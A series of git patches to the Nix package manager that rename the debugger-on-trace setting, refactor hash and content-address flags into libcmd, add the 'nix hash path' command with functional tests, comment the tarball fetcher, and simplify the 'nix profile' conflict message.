index d4e55d59c..721928550 100644
--- a/doc/manual/rl-next/debugger-on-trace.md
+++ b/doc/manual/rl-next/debugger-on-trace.md
@@ -1,9 +1,9 @@
 ---
-synopsis: Enter the `--debugger` when `builtins.trace` is called if `builtins-trace-debugger` is set
+synopsis: Enter the `--debugger` when `builtins.trace` is called if `debugger-on-trace` is set
 prs: 9914
 ---
 
-If the `builtins-trace-debugger` option is set and `--debugger` is given,
+If the `debugger-on-trace` option is set and `--debugger` is given,
 `builtins.trace` calls will behave similarly to `builtins.break` and will enter
 the debug REPL. This is useful for determining where warnings are being emitted
 from.
diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh
index 757daebc0..b5783d28f 100644
--- a/src/libexpr/eval-settings.hh
+++ b/src/libexpr/eval-settings.hh
@@ -128,8 +128,15 @@ struct EvalSettings : Config
     Setting maxCallDepth{this, 10000, "max-call-depth",
         "The maximum function call depth to allow before erroring."};
 
-    Setting builtinsTraceDebugger{this, false, "builtins-trace-debugger",
-        "Whether to enter the debugger on `builtins.trace` calls."};
+    Setting builtinsTraceDebugger{this, false, "debugger-on-trace",
+        R"(
+          If set to true and the `--debugger` flag is given,
+          [`builtins.trace`](@docroot@/language/builtins.md#builtins-trace) will
+          enter the debugger like
+          [`builtins.break`](@docroot@/language/builtins.md#builtins-break).
+
+          This is useful for debugging warnings in third-party Nix code.
+        )"};
 };
 
 extern EvalSettings evalSettings;
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index a24a2d018..0ee146359 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -1010,6 +1010,12 @@ static RegisterPrimOp primop_trace({
       Evaluate *e1* and print its abstract syntax representation on
       standard error. Then return *e2*. This function is useful for
       debugging.
+
+      If the
+      [`debugger-on-trace`](@docroot@/command-ref/conf-file.md#conf-debugger-on-trace)
+      option is set to `true` and the `--debugger` flag is given, the
+      interactive debugger will be started when `trace` is called (like
+      [`break`](@docroot@/language/builtins.md#builtins-break)).
     )",
     .fun = prim_trace,
 });

From efd36b49e84335f324c9d4c2dcd511f126aa4d60 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Fri, 19 Jan 2024 21:11:56 -0500
Subject: [PATCH 498/654] `nix hash path`, and preparatory refactors

- `nix store add` supports text hashing

  With functional test ensuring it matches `builtins.toFile`.

- Factored-out flags for both commands

- Move all common reusable flags to `libcmd`

  - They are not part of the *definition* of the CLI infra, just a usage
    of it.

  - The `libstore` flag couldn't go in `args.hh` in libutil anyways,
    would be awkward for it to live alone

- Shuffle around `Cmd*` hierarchy so flags for deprecated commands don't
  end up on the new ones
---
 src/libcmd/misc-store-flags.cc | 121 +++++++++++++++++++++++++++++++++
 src/libcmd/misc-store-flags.hh |  21 ++++++
 src/libutil/args.cc            |  67 ------------------
 src/libutil/args.hh            |  19 +++---
 src/nix/add-to-store.cc        |  20 +-----
 src/nix/hash.cc                |  99 ++++++++++++++++++---------
 src/nix/prefetch.cc            |   3 +-
 tests/functional/add.sh        |   5 ++
 tests/functional/hash-path.sh  |  28 +++++---
 9 files changed, 245 insertions(+), 138 deletions(-)
 create mode 100644 src/libcmd/misc-store-flags.cc
 create mode 100644 src/libcmd/misc-store-flags.hh

diff --git a/src/libcmd/misc-store-flags.cc b/src/libcmd/misc-store-flags.cc
new file mode 100644
index 000000000..e66d3f63b
--- /dev/null
+++ b/src/libcmd/misc-store-flags.cc
@@ -0,0 +1,121 @@
+#include "misc-store-flags.hh"
+
+namespace nix::flag
+{
+
+static void hashFormatCompleter(AddCompletions & completions, size_t index, std::string_view prefix)
+{
+    for (auto & format : hashFormats) {
+        if (hasPrefix(format, prefix)) {
+            completions.add(format);
+        }
+    }
+}
+
+Args::Flag hashFormatWithDefault(std::string && longName, HashFormat * hf)
+{
+    assert(*hf == nix::HashFormat::SRI);
+    return Args::Flag {
+            .longName = std::move(longName),
+            .description = "Hash format (`base16`, `nix32`, `base64`, `sri`). Default: `sri`.",
+            .labels = {"hash-format"},
+            .handler = {[hf](std::string s) {
+                *hf = parseHashFormat(s);
+            }},
+            .completer = hashFormatCompleter,
+    };
+}
+
+Args::Flag hashFormatOpt(std::string && longName, std::optional * ohf)
+{
+    return Args::Flag {
+            .longName = std::move(longName),
+            .description = "Hash format (`base16`, `nix32`, `base64`, `sri`).",
+            .labels = {"hash-format"},
+            .handler = {[ohf](std::string s) {
+                *ohf = std::optional{parseHashFormat(s)};
+            }},
+            .completer = hashFormatCompleter,
+    };
+}
+
+static void hashAlgoCompleter(AddCompletions & completions, size_t index, std::string_view prefix)
+{
+    for (auto & algo : hashAlgorithms)
+        if (hasPrefix(algo, prefix))
+            completions.add(algo);
+}
+
+Args::Flag hashAlgo(std::string && longName, HashAlgorithm * ha)
+{
+    return Args::Flag {
+            .longName = std::move(longName),
+            .description = "Hash algorithm (`md5`, `sha1`, `sha256`, or `sha512`).",
+            .labels = {"hash-algo"},
+            .handler = {[ha](std::string s) {
+                *ha = parseHashAlgo(s);
+            }},
+            .completer = hashAlgoCompleter,
+    };
+}
+
+Args::Flag hashAlgoOpt(std::string && longName, std::optional * oha)
+{
+    return Args::Flag {
+            .longName = std::move(longName),
+            .description = "Hash algorithm (`md5`, `sha1`, `sha256`, or `sha512`). Can be omitted for SRI hashes.",
+            .labels = {"hash-algo"},
+            .handler = {[oha](std::string s) {
+                *oha = std::optional{parseHashAlgo(s)};
+            }},
+            .completer = hashAlgoCompleter,
+    };
+}
+
+Args::Flag fileIngestionMethod(FileIngestionMethod * method)
+{
+    return Args::Flag {
+        .longName  = "mode",
+        // FIXME indentation carefully made for context, this is messed up.
+        .description = R"(
+    How to compute the hash of the input.
+    One of:
+
+    - `nar` (the default): Serialises the input as an archive (following the [_Nix Archive Format_](https://edolstra.github.io/pubs/phd-thesis.pdf#page=101)) and passes that to the hash function.
+
+    - `flat`: Assumes that the input is a single file and directly passes it to the hash function;
+        )",
+        .labels = {"file-ingestion-method"},
+        .handler = {[method](std::string s) {
+            *method = parseFileIngestionMethod(s);
+        }},
+    };
+}
+
+Args::Flag contentAddressMethod(ContentAddressMethod * method)
+{
+    return Args::Flag {
+        .longName  = "mode",
+        // FIXME indentation carefully made for context, this is messed up.
+        .description = R"(
+    How to compute the content-address of the store object.
+    One of:
+
+    - `nar` (the default): Serialises the input as an archive (following the [_Nix Archive Format_](https://edolstra.github.io/pubs/phd-thesis.pdf#page=101)) and passes that to the hash function.
+
+    - `flat`: Assumes that the input is a single file and directly passes it to the hash function;
+
+    - `text`: Like `flat`, but used for
+      [derivations](@docroot@/glossary.md#store-derivation) serialized in store object and 
+      [`builtins.toFile`](@docroot@/language/builtins.html#builtins-toFile).
+      For advanced use-cases only;
+      for regular usage prefer `nar` and `flat`.
+        )",
+        .labels = {"content-address-method"},
+        .handler = {[method](std::string s) {
+            *method = ContentAddressMethod::parse(s);
+        }},
+    };
+}
+
+}
diff --git a/src/libcmd/misc-store-flags.hh b/src/libcmd/misc-store-flags.hh
new file mode 100644
index 000000000..124372af7
--- /dev/null
+++ b/src/libcmd/misc-store-flags.hh
@@ -0,0 +1,21 @@
+#include "args.hh"
+#include "content-address.hh"
+
+namespace nix::flag {
+
+Args::Flag hashAlgo(std::string && longName, HashAlgorithm * ha);
+static inline Args::Flag hashAlgo(HashAlgorithm * ha)
+{
+    return hashAlgo("hash-algo", ha);
+}
+Args::Flag hashAlgoOpt(std::string && longName, std::optional * oha);
+Args::Flag hashFormatWithDefault(std::string && longName, HashFormat * hf);
+Args::Flag hashFormatOpt(std::string && longName, std::optional * ohf);
+static inline Args::Flag hashAlgoOpt(std::optional * oha)
+{
+    return hashAlgoOpt("hash-algo", oha);
+}
+Args::Flag fileIngestionMethod(FileIngestionMethod * method);
+Args::Flag contentAddressMethod(ContentAddressMethod * method);
+
+}
diff --git a/src/libutil/args.cc b/src/libutil/args.cc
index 8996cbe5b..a981ed9fb 100644
--- a/src/libutil/args.cc
+++ b/src/libutil/args.cc
@@ -544,73 +544,6 @@ nlohmann::json Args::toJSON()
     return res;
 }
 
-static void hashFormatCompleter(AddCompletions & completions, size_t index, std::string_view prefix)
-{
-    for (auto & format : hashFormats) {
-        if (hasPrefix(format, prefix)) {
-            completions.add(format);
-        }
-    }
-}
-
-Args::Flag Args::Flag::mkHashFormatFlagWithDefault(std::string &&longName, HashFormat * hf) {
-    assert(*hf == nix::HashFormat::SRI);
-    return Flag{
-            .longName = std::move(longName),
-            .description = "Hash format (`base16`, `nix32`, `base64`, `sri`). Default: `sri`.",
-            .labels = {"hash-format"},
-            .handler = {[hf](std::string s) {
-                *hf = parseHashFormat(s);
-            }},
-            .completer = hashFormatCompleter,
-    };
-}
-
-Args::Flag Args::Flag::mkHashFormatOptFlag(std::string && longName, std::optional * ohf) {
-    return Flag{
-            .longName = std::move(longName),
-            .description = "Hash format (`base16`, `nix32`, `base64`, `sri`).",
-            .labels = {"hash-format"},
-            .handler = {[ohf](std::string s) {
-                *ohf = std::optional{parseHashFormat(s)};
-            }},
-            .completer = hashFormatCompleter,
-    };
-}
-
-static void hashAlgoCompleter(AddCompletions & completions, size_t index, std::string_view prefix)
-{
-    for (auto & algo : hashAlgorithms)
-        if (hasPrefix(algo, prefix))
-            completions.add(algo);
-}
-
-Args::Flag Args::Flag::mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha)
-{
-    return Flag{
-            .longName = std::move(longName),
-            .description = "Hash algorithm (`md5`, `sha1`, `sha256`, or `sha512`).",
-            .labels = {"hash-algo"},
-            .handler = {[ha](std::string s) {
-                *ha = parseHashAlgo(s);
-            }},
-            .completer = hashAlgoCompleter,
-    };
-}
-
-Args::Flag Args::Flag::mkHashAlgoOptFlag(std::string && longName, std::optional * oha)
-{
-    return Flag{
-            .longName = std::move(longName),
-            .description = "Hash algorithm (`md5`, `sha1`, `sha256`, or `sha512`). Can be omitted for SRI hashes.",
-            .labels = {"hash-algo"},
-            .handler = {[oha](std::string s) {
-                *oha = std::optional{parseHashAlgo(s)};
-            }},
-            .completer = hashAlgoCompleter,
-    };
-}
-
 static void _completePath(AddCompletions & completions, std::string_view prefix, bool onlyDirs)
 {
     completions.setType(Completions::Type::Filenames);
diff --git a/src/libutil/args.hh b/src/libutil/args.hh
index 6c9c48065..4b2e1d960 100644
--- a/src/libutil/args.hh
+++ b/src/libutil/args.hh
@@ -155,6 +155,8 @@ protected:
      */
     using CompleterClosure = std::function;
 
+public:
+
     /**
      * Description of flags / options
      *
@@ -175,19 +177,10 @@ protected:
         CompleterClosure completer;
 
         std::optional experimentalFeature;
-
-        static Flag mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha);
-        static Flag mkHashAlgoFlag(HashAlgorithm * ha) {
-            return mkHashAlgoFlag("hash-algo", ha);
-        }
-        static Flag mkHashAlgoOptFlag(std::string && longName, std::optional * oha);
-        static Flag mkHashAlgoOptFlag(std::optional * oha) {
-            return mkHashAlgoOptFlag("hash-algo", oha);
-        }
-        static Flag mkHashFormatFlagWithDefault(std::string && longName, HashFormat * hf);
-        static Flag mkHashFormatOptFlag(std::string && longName, std::optional * ohf);
     };
 
+protected:
+
     /**
      * Index of all registered "long" flag descriptions (flags like
      * `--long`).
@@ -206,6 +199,8 @@ protected:
      */
     virtual bool processFlag(Strings::iterator & pos, Strings::iterator end);
 
+public:
+
     /**
      * Description of positional arguments
      *
@@ -220,6 +215,8 @@ protected:
         CompleterClosure completer;
     };
 
+protected:
+
     /**
      * Queue of expected positional argument forms.
      *
diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc
index 9ea37ab4c..ca2daecab 100644
--- a/src/nix/add-to-store.cc
+++ b/src/nix/add-to-store.cc
@@ -3,6 +3,7 @@
 #include "store-api.hh"
 #include "archive.hh"
 #include "posix-source-accessor.hh"
+#include "misc-store-flags.hh"
 
 using namespace nix;
 
@@ -26,23 +27,9 @@ struct CmdAddToStore : MixDryRun, StoreCommand
             .handler = {&namePart},
         });
 
-        addFlag({
-            .longName  = "mode",
-            .description = R"(
-    How to compute the hash of the input.
-    One of:
+        addFlag(flag::contentAddressMethod(&caMethod));
 
-    - `nar` (the default): Serialises the input as an archive (following the [_Nix Archive Format_](https://edolstra.github.io/pubs/phd-thesis.pdf#page=101)) and passes that to the hash function.
-
-    - `flat`: Assumes that the input is a single file and directly passes it to the hash function;
-            )",
-            .labels = {"hash-mode"},
-            .handler = {[this](std::string s) {
-                this->caMethod = parseFileIngestionMethod(s);
-            }},
-        });
-
-        addFlag(Flag::mkHashAlgoFlag(&hashAlgo));
+        addFlag(flag::hashAlgo(&hashAlgo));
     }
 
     void run(ref store) override
@@ -63,7 +50,6 @@ struct CmdAddToStore : MixDryRun, StoreCommand
 
 struct CmdAdd : CmdAddToStore
 {
-
     std::string description() override
     {
         return "Add a file or directory to the Nix store";
diff --git a/src/nix/hash.cc b/src/nix/hash.cc
index eec1c0eae..98d227f0e 100644
--- a/src/nix/hash.cc
+++ b/src/nix/hash.cc
@@ -6,11 +6,12 @@
 #include "references.hh"
 #include "archive.hh"
 #include "posix-source-accessor.hh"
+#include "misc-store-flags.hh"
 
 using namespace nix;
 
 /**
- * Base for `nix hash file` (deprecated), `nix hash path` and `nix-hash` (legacy).
+ * Base for `nix hash path`, `nix hash file` (deprecated), and `nix-hash` (legacy).
  *
  * Deprecation Issue: https://github.com/NixOS/nix/issues/8876
  */
@@ -19,12 +20,21 @@ struct CmdHashBase : Command
     FileIngestionMethod mode;
     HashFormat hashFormat = HashFormat::SRI;
     bool truncate = false;
-    HashAlgorithm ha = HashAlgorithm::SHA256;
+    HashAlgorithm hashAlgo = HashAlgorithm::SHA256;
     std::vector paths;
     std::optional modulus;
 
     explicit CmdHashBase(FileIngestionMethod mode) : mode(mode)
     {
+        expectArgs({
+            .label = "paths",
+            .handler = {&paths},
+            .completer = completePath
+        });
+
+        // FIXME The following flags should be deprecated, but we don't
+        // yet have a mechanism for that.
+
         addFlag({
             .longName = "sri",
             .description = "Print the hash in SRI format.",
@@ -49,22 +59,7 @@ struct CmdHashBase : Command
             .handler = {&hashFormat, HashFormat::Base16},
         });
 
-        addFlag(Flag::mkHashAlgoFlag("type", &ha));
-
-        #if 0
-        addFlag({
-            .longName = "modulo",
-            .description = "Compute the hash modulo the specified string.",
-            .labels = {"modulus"},
-            .handler = {&modulus},
-        });
-        #endif\
-
-        expectArgs({
-            .label = "paths",
-            .handler = {&paths},
-            .completer = completePath
-        });
+        addFlag(flag::hashAlgo("type", &hashAlgo));
     }
 
     std::string description() override
@@ -85,9 +80,9 @@ struct CmdHashBase : Command
 
             std::unique_ptr hashSink;
             if (modulus)
-                hashSink = std::make_unique(ha, *modulus);
+                hashSink = std::make_unique(hashAlgo, *modulus);
             else
-                hashSink = std::make_unique(ha);
+                hashSink = std::make_unique(hashAlgo);
 
             auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(path);
             dumpPath(accessor, canonPath, *hashSink, mode);
@@ -99,15 +94,53 @@ struct CmdHashBase : Command
     }
 };
 
+/**
+ * `nix hash path`
+ */
+struct CmdHashPath : CmdHashBase
+{
+    CmdHashPath()
+        : CmdHashBase(FileIngestionMethod::Recursive)
+    {
+        addFlag(flag::hashAlgo("algo", &hashAlgo));
+        addFlag(flag::fileIngestionMethod(&mode));
+        addFlag(flag::hashFormatWithDefault("format", &hashFormat));
+        #if 0
+        addFlag({
+            .longName = "modulo",
+            .description = "Compute the hash modulo the specified string.",
+            .labels = {"modulus"},
+            .handler = {&modulus},
+        });
+        #endif
+    }
+};
+
+/**
+ * For deprecated `nix hash file`
+ *
+ * Deprecation Issue: https://github.com/NixOS/nix/issues/8876
+ */
+struct CmdHashFile : CmdHashBase
+{
+    CmdHashFile()
+        : CmdHashBase(FileIngestionMethod::Flat)
+    {
+    }
+};
+
+/**
+ * For deprecated `nix hash to-*`
+ */
 struct CmdToBase : Command
 {
     HashFormat hashFormat;
-    std::optional ht;
+    std::optional hashAlgo;
     std::vector args;
 
     CmdToBase(HashFormat hashFormat) : hashFormat(hashFormat)
     {
-        addFlag(Flag::mkHashAlgoOptFlag("type", &ht));
+        addFlag(flag::hashAlgoOpt("type", &hashAlgo));
         expectArgs("strings", &args);
     }
 
@@ -124,7 +157,7 @@ struct CmdToBase : Command
     {
         warn("The old format conversion sub commands of `nix hash` where deprecated in favor of `nix hash convert`.");
         for (auto s : args)
-            logger->cout(Hash::parseAny(s, ht).to_string(hashFormat, hashFormat == HashFormat::SRI));
+            logger->cout(Hash::parseAny(s, hashAlgo).to_string(hashFormat, hashFormat == HashFormat::SRI));
     }
 };
 
@@ -139,9 +172,9 @@ struct CmdHashConvert : Command
     std::vector hashStrings;
 
     CmdHashConvert(): to(HashFormat::SRI) {
-        addFlag(Args::Flag::mkHashFormatOptFlag("from", &from));
-        addFlag(Args::Flag::mkHashFormatFlagWithDefault("to", &to));
-        addFlag(Args::Flag::mkHashAlgoOptFlag(&algo));
+        addFlag(flag::hashFormatOpt("from", &from));
+        addFlag(flag::hashFormatWithDefault("to", &to));
+        addFlag(flag::hashAlgoOpt(&algo));
         expectArgs({
            .label = "hashes",
            .handler = {&hashStrings},
@@ -181,8 +214,8 @@ struct CmdHash : NixMultiCommand
             "hash",
             {
                 {"convert", []() { return make_ref();}},
-                {"file", []() { return make_ref(FileIngestionMethod::Flat);; }},
-                {"path", []() { return make_ref(FileIngestionMethod::Recursive); }},
+                {"path", []() { return make_ref(); }},
+                {"file", []() { return make_ref(); }},
                 {"to-base16", []() { return make_ref(HashFormat::Base16); }},
                 {"to-base32", []() { return make_ref(HashFormat::Nix32); }},
                 {"to-base64", []() { return make_ref(HashFormat::Base64); }},
@@ -206,7 +239,7 @@ static int compatNixHash(int argc, char * * argv)
     // Wait until `nix hash convert` is not hidden behind experimental flags anymore.
     // warn("`nix-hash` has been deprecated in favor of `nix hash convert`.");
 
-    std::optional ha;
+    std::optional hashAlgo;
     bool flat = false;
     HashFormat hashFormat = HashFormat::Base16;
     bool truncate = false;
@@ -226,7 +259,7 @@ static int compatNixHash(int argc, char * * argv)
         else if (*arg == "--truncate") truncate = true;
         else if (*arg == "--type") {
             std::string s = getArg(*arg, arg, end);
-            ha = parseHashAlgo(s);
+            hashAlgo = parseHashAlgo(s);
         }
         else if (*arg == "--to-base16") {
             op = opTo;
@@ -253,8 +286,8 @@ static int compatNixHash(int argc, char * * argv)
 
     if (op == opHash) {
         CmdHashBase cmd(flat ? FileIngestionMethod::Flat : FileIngestionMethod::Recursive);
-        if (!ha.has_value()) ha = HashAlgorithm::MD5;
-        cmd.ha = ha.value();
+        if (!hashAlgo.has_value()) hashAlgo = HashAlgorithm::MD5;
+        cmd.hashAlgo = hashAlgo.value();
         cmd.hashFormat = hashFormat;
         cmd.truncate = truncate;
         cmd.paths = ss;
@@ -264,7 +297,7 @@ static int compatNixHash(int argc, char * * argv)
     else {
         CmdToBase cmd(hashFormat);
         cmd.args = ss;
-        if (ha.has_value()) cmd.ht = ha;
+        if (hashAlgo.has_value()) cmd.hashAlgo = hashAlgo;
         cmd.run();
     }
 
diff --git a/src/nix/prefetch.cc b/src/nix/prefetch.cc
index 6e3f878d9..fabec5d88 100644
--- a/src/nix/prefetch.cc
+++ b/src/nix/prefetch.cc
@@ -10,6 +10,7 @@
 #include "eval-inline.hh"
 #include "legacy.hh"
 #include "posix-source-accessor.hh"
+#include "misc-store-flags.hh"
 
 #include 
 
@@ -284,7 +285,7 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON
             }}
         });
 
-        addFlag(Flag::mkHashAlgoFlag("hash-type", &hashAlgo));
+        addFlag(flag::hashAlgo("hash-type", &hashAlgo));
 
         addFlag({
             .longName = "executable",
diff --git a/tests/functional/add.sh b/tests/functional/add.sh
index 762e01dbe..a4bb0e225 100644
--- a/tests/functional/add.sh
+++ b/tests/functional/add.sh
@@ -45,3 +45,8 @@ clearStore
     [[ "$path1" == "$path2" ]]
     path4=$(nix store add --mode flat --hash-algo sha1 ./dummy)
 )
+(
+    path1=$(nix store add --mode text ./dummy)
+    path2=$(nix eval --impure --raw --expr 'builtins.toFile "dummy" (builtins.readFile ./dummy)')
+    [[ "$path1" == "$path2" ]]
+)
diff --git a/tests/functional/hash-path.sh b/tests/functional/hash-path.sh
index 6d096b29b..4ad9f8ff2 100644
--- a/tests/functional/hash-path.sh
+++ b/tests/functional/hash-path.sh
@@ -2,19 +2,24 @@ source common.sh
 
 try () {
     printf "%s" "$2" > $TEST_ROOT/vector
-    hash="$(nix-hash --flat ${FORMAT_FLAG-} --type "$1" "$TEST_ROOT/vector")"
+    hash="$(nix-hash --flat ${FORMAT+--$FORMAT} --type "$1" "$TEST_ROOT/vector")"
     if ! (( "${NO_TEST_CLASSIC-}" )) && test "$hash" != "$3"; then
         echo "try nix-hash: hash $1, expected $3, got $hash"
         exit 1
     fi
-    hash="$(nix hash file ${FORMAT_FLAG-} --type "$1" "$TEST_ROOT/vector")"
+    hash="$(nix hash file ${FORMAT+--$FORMAT} --type "$1" "$TEST_ROOT/vector")"
+    if ! (( "${NO_TEST_NIX_COMMAND-}" )) && test "$hash" != "$3"; then
+        echo "try nix hash: hash $1, expected $3, got $hash"
+        exit 1
+    fi
+    hash="$(nix hash path --mode flat ${FORMAT+--format $FORMAT} --algo "$1" "$TEST_ROOT/vector")"
     if ! (( "${NO_TEST_NIX_COMMAND-}" )) && test "$hash" != "$3"; then
         echo "try nix hash: hash $1, expected $3, got $hash"
         exit 1
     fi
 }
 
-FORMAT_FLAG=--base16
+FORMAT=base16
 try md5 "" "d41d8cd98f00b204e9800998ecf8427e"
 try md5 "a" "0cc175b9c0f1b6a831c399e269772661"
 try md5 "abc" "900150983cd24fb0d6963f7d28e17f72"
@@ -34,18 +39,18 @@ try sha256 "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq" "248d6a61d
 try sha512 "" "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e"
 try sha512 "abc" "ddaf35a193617abacc417349ae20413112e6fa4e89a97ea20a9eeee64b55d39a2192992a274fc1a836ba3c23a3feebbd454d4423643ce80e2a9ac94fa54ca49f"
 try sha512 "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq" "204a8fc6dda82f0a0ced7beb8e08a41657c16ef468b228a8279be331a703c33596fd15c13b1b07f9aa1d3bea57789ca031ad85c7a71dd70354ec631238ca3445"
-unset FORMAT_FLAG
+unset FORMAT
 
-FORMAT_FLAG=--base32
+FORMAT=base32
 try sha256 "abc" "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s"
-unset FORMAT_FLAG
+unset FORMAT
 
-FORMAT_FLAG=--sri
+FORMAT=sri
 try sha512 "" "sha512-z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXcg/SpIdNs6c5H0NE8XYXysP+DGNKHfuwvY7kxvUdBeoGlODJ6+SfaPg=="
 try sha512 "abc" "sha512-3a81oZNherrMQXNJriBBMRLm+k6JqX6iCp7u5ktV05ohkpkqJ0/BqDa6PCOj/uu9RU1EI2Q86A4qmslPpUyknw=="
 try sha512 "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq" "sha512-IEqPxt2oLwoM7XvrjgikFlfBbvRosiioJ5vjMacDwzWW/RXBOxsH+aodO+pXeJygMa2Fx6cd1wNU7GMSOMo0RQ=="
 try sha256 "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq" "sha256-JI1qYdIGOLjlwCaTDD5gOaM85Flk/yFn9uzt1BnbBsE="
-unset FORMAT_FLAG
+unset FORMAT
 
 # nix-hash [--flat] defaults to the Base16 format
 NO_TEST_NIX_COMMAND=1 try sha512 "abc" "ddaf35a193617abacc417349ae20413112e6fa4e89a97ea20a9eeee64b55d39a2192992a274fc1a836ba3c23a3feebbd454d4423643ce80e2a9ac94fa54ca49f"
@@ -56,7 +61,12 @@ NO_TEST_CLASSIC=1 try sha512 "abc" "sha512-3a81oZNherrMQXNJriBBMRLm+k6JqX6iCp7u5
 try2 () {
     hash=$(nix-hash --type "$1" $TEST_ROOT/hash-path)
     if test "$hash" != "$2"; then
-        echo "hash $1, expected $2, got $hash"
+        echo "try nix-hash; hash $1, expected $2, got $hash"
+        exit 1
+    fi
+    hash="$(nix hash path --mode nar --format base16 --algo "$1" "$TEST_ROOT/hash-path")"
+    if test "$hash" != "$2"; then
+        echo "try nix hash: hash $1, expected $2, got $hash"
         exit 1
     fi
 }

From e391fc21019a2ada9a431e195e56188add23427f Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 21:05:10 +0100
Subject: [PATCH 499/654] Add comments

---
 src/libfetchers/tarball.cc | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/src/libfetchers/tarball.cc b/src/libfetchers/tarball.cc
index e3b1fbe56..d4edbb767 100644
--- a/src/libfetchers/tarball.cc
+++ b/src/libfetchers/tarball.cc
@@ -138,6 +138,8 @@ DownloadTarballResult downloadTarball(
         cached.reset();
 
     if (cached && !cached->expired)
+        /* We previously downloaded this tarball and it's younger than
+           `tarballTtl`, so no need to check the server. */
         return attrsToResult(cached->infoAttrs);
 
     auto _res = std::make_shared>();
@@ -165,6 +167,8 @@ DownloadTarballResult downloadTarball(
     Attrs infoAttrs;
 
     if (res->cached) {
+        /* The server says that the previously downloaded version is
+           still current. */
         infoAttrs = cached->infoAttrs;
     } else {
         infoAttrs.insert_or_assign("etag", res->etag);
@@ -229,6 +233,11 @@ struct CurlInputScheme : InputScheme
             if (auto n = string2Int(*i))
                 input.attrs.insert_or_assign("lastModified", *n);
 
+        /* The URL query parameters serve two roles: specifying fetch
+           settings for Nix itself, and arbitrary data as part of the
+           HTTP request. Now that we've processed the Nix-specific
+           attributes above, remove them so we don't also send them as
+           part of the HTTP request. */
         for (auto & param : allowedAttrs())
             url.query.erase(param);
 
@@ -288,6 +297,10 @@ struct FileInputScheme : CurlInputScheme
     {
         auto input(_input);
 
+        /* Unlike TarballInputScheme, this stores downloaded files in
+           the Nix store directly, since there is little deduplication
+           benefit in using the Git cache for single big files like
+           tarballs. */
         auto file = downloadFile(store, getStrAttr(input.attrs, "url"), input.getName(), false);
 
         auto narHash = store->queryPathInfo(file.storePath)->narHash;

From 4ae5091716fa023230a779db03c1cf1e5687c6fb Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 21 Feb 2024 21:55:51 +0100
Subject: [PATCH 500/654] nix profile: suggest removal using entry name

When a file conflict arises during a package install a suggestion is
made to remove the old entry. This was previously done using the
installable URLs of the old entry. These URLs are quite verbose and
often do not equal the URL of the existing entry.

This change uses the recently introduced profile entry name for the
suggestion, resulting in a simpler output.

The improvement is easily seen in the change to the functional test.
---
 src/nix/profile.cc              | 12 ++++++------
 tests/functional/nix-profile.sh |  2 +-
 2 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index 812e703b4..fc669d5ed 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -400,13 +400,13 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
             //       See https://github.com/NixOS/nix/compare/3efa476c5439f8f6c1968a6ba20a31d1239c2f04..1fe5d172ece51a619e879c4b86f603d9495cc102
             auto findRefByFilePath = [&](Iterator begin, Iterator end) {
                 for (auto it = begin; it != end; it++) {
-                    auto & profileElement = it->second;
+                    auto & [name, profileElement] = *it;
                     for (auto & storePath : profileElement.storePaths) {
                         if (conflictError.fileA.starts_with(store->printStorePath(storePath))) {
-                            return std::pair(conflictError.fileA, profileElement.toInstallables(*store));
+                            return std::tuple(conflictError.fileA, name, profileElement.toInstallables(*store));
                         }
                         if (conflictError.fileB.starts_with(store->printStorePath(storePath))) {
-                            return std::pair(conflictError.fileB, profileElement.toInstallables(*store));
+                            return std::tuple(conflictError.fileB, name, profileElement.toInstallables(*store));
                         }
                     }
                 }
@@ -415,9 +415,9 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
             // There are 2 conflicting files. We need to find out which one is from the already installed package and
             // which one is the package that is the new package that is being installed.
             // The first matching package is the one that was already installed (original).
-            auto [originalConflictingFilePath, originalConflictingRefs] = findRefByFilePath(manifest.elements.begin(), manifest.elements.end());
+            auto [originalConflictingFilePath, originalEntryName, originalConflictingRefs] = findRefByFilePath(manifest.elements.begin(), manifest.elements.end());
             // The last matching package is the one that was going to be installed (new).
-            auto [newConflictingFilePath, newConflictingRefs] = findRefByFilePath(manifest.elements.rbegin(), manifest.elements.rend());
+            auto [newConflictingFilePath, newEntryName, newConflictingRefs] = findRefByFilePath(manifest.elements.rbegin(), manifest.elements.rend());
 
             throw Error(
                 "An existing package already provides the following file:\n"
@@ -443,7 +443,7 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
                 "  nix profile install %4% --priority %7%\n",
                 originalConflictingFilePath,
                 newConflictingFilePath,
-                concatStringsSep(" ", originalConflictingRefs),
+                originalEntryName,
                 concatStringsSep(" ", newConflictingRefs),
                 conflictError.priority,
                 conflictError.priority - 1,
diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index 35a62fbe2..88b713d53 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -166,7 +166,7 @@ error: An existing package already provides the following file:
 
        To remove the existing package:
 
-         nix profile remove path:${flake1Dir}#packages.${system}.default
+         nix profile remove flake1
 
        The new package can also be installed next to the existing one by assigning a different priority.
        The conflicting packages have a priority of 5.

